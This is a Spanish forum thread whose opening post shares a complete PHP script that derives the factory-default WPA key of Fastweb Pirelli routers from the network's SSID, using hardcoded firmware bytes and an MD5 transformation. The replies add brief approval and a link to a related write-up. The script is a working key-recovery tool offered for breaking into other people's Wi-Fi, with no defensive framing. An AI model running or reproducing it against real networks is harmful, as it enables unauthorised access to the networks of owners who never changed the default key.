Título: FastWeb Pirelli WPA Discovery (Saber WPA redes FASTWEB-1-XXX)
Publicado por: P4nd3m0n1um en 11 Noviembre 2012, 21:20 pm
Simple Script para saber la clave WPA por defecto de las redes FASTWEB-1-00193EA1B2C3: <?php /*************************************************************************** * FastWeb Pirelli WPA Discovery * * by evilsocket - evilsocket@gmail.com - http://www.evilsocket.net * * * * This program is free software; you can redistribute it and/or modify * * it under the terms of the GNU General Public License as published by * * the Free Software Foundation; either version 2 of the License, or * * (at your option) any later version. * * * * This program is distributed in the hope that it will be useful, * * but WITHOUT ANY WARRANTY; without even the implied warranty of * * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * * GNU General Public License for more details. * * * * You should have received a copy of the GNU General Public License * * along with this program; if not, write to the * * Free Software Foundation, Inc., * * 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. * ***************************************************************************/
/* * SSID di partenza. */ $ssid = "FASTWEB-1-00193EA1B2C3"; /* * 20 byte costanti cablati nel firmware dei Pirelli Fastweb. */ $seq_20 = "\x22\x33\x11\x34\x02\x81\xFA\x22\x11\x41\x68\x11\x12\x01\x05\x22\x71\x42\x10\x66"; /* * Prelevo la parte finale del SSID. */ $sn = split( '-', $ssid ); $sn = $sn[2]; /* * La divido in gruppi di due caratteri, formando un array * di 6 rappresentazioni esadecimali di byte. */ preg_match_all( "/[a-f0-9]{2}/i", $sn, $sn_bytes ); $sn_bytes = $sn_bytes[0]; /* * Inizializzo una stringa con il valore intero di questi byte. */ $str = ""; for( $i = 0; $i < 6; $i++ ){ $str .= chr( hexdec( $sn_bytes[$i] ) ); } echo "$str\n";
/* * Aggiungo alla stringa i 20 byte "magici". */ $str .= $seq_20; /* * Ricavo i byte dell'hash md5 della stringa */ preg_match_all( "/[a-f0-9]{2}/i", md5($str), $md5_bytes ); $md5_bytes = $md5_bytes[0]; $long = ""; /* * Converto i byte in sequenze binarie di 8 bit. */ foreach( $md5_bytes as $byte ){ $long .= sprintf( "%08s", decbin( hexdec($byte) ) ); } /* * Divido in 5 gruppi di 5 bit ognuno e, qual'ora il valore intero * di un gruppo sia maggiore di 0x0a, aggiungo 0x57. */ $hex_5 = array(); for( $i = 0; $i < 25; $i += 5 ){ $n = bindec( substr( $long, $i, 5 ) ); $hex_5[] = $n > 0x0a ? $n + 0x57 : $n; } /* * Compongo la chiave. */ $wpa = ""; foreach( $hex_5 as $hex ){ $wpa .= sprintf( "%02x", $hex ); }
print "WPA : $wpa\n";
?>
Título: Re: FastWeb Pirelli WPA Discovery (Saber WPA redes FASTWEB-1-XXX)
Publicado por: pianista en 14 Noviembre 2012, 11:07 am
Interesante, no he visto muchas por aquí ni de las de Alice, pero desde luego todos los avances en esta línea bienvenidos sean ;)
Saludos
Título: Re: FastWeb Pirelli WPA Discovery (Saber WPA redes FASTWEB-1-XXX)
Publicado por: HalconEye en 20 Enero 2013, 13:27 pm
http://sviehb.wordpress.com/2011/12/04/prg-eav4202n-default-wpa-key-algorithm/
|